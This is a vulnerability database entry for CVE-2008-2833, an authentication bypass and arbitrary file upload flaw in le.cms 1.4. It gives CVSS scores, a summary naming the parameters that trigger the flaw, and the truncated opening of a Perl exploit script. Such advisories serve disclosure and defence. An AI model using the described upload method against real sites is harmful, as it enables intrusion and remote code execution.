10
CVSSv2

CVE-2008-2833

Published: 24/06/2008 Updated: 29/09/2017
CVSS v2 Base Score: 10 | Impact Score: 10 | Exploitability Score: 10
VMScore: 1000
Vector: AV:N/AC:L/Au:N/C:C/I:C/A:C

Vulnerability Summary

admin/upload.php in le.cms 1.4 and previous versions allows remote malicious users to bypass administrative authentication, and upload and execute arbitrary files in images/, via a nonzero value for the submit0 parameter in conjunction with filenames in the filename and upload parameters.

Vulnerable Product Search on Vulmon Subscribe to Product

worldlevel le.cms

Exploits

#!/usr/bin/perl use strict; use warnings; use LWP::UserAgent; use HTTP::Request::Common; print <<INTRO; - - - - - - - - - - - - - - - - - - - - - - - - - - - - - LECMS <= 14 Remote Arbitrary File Upload Exploit - - - - - - ...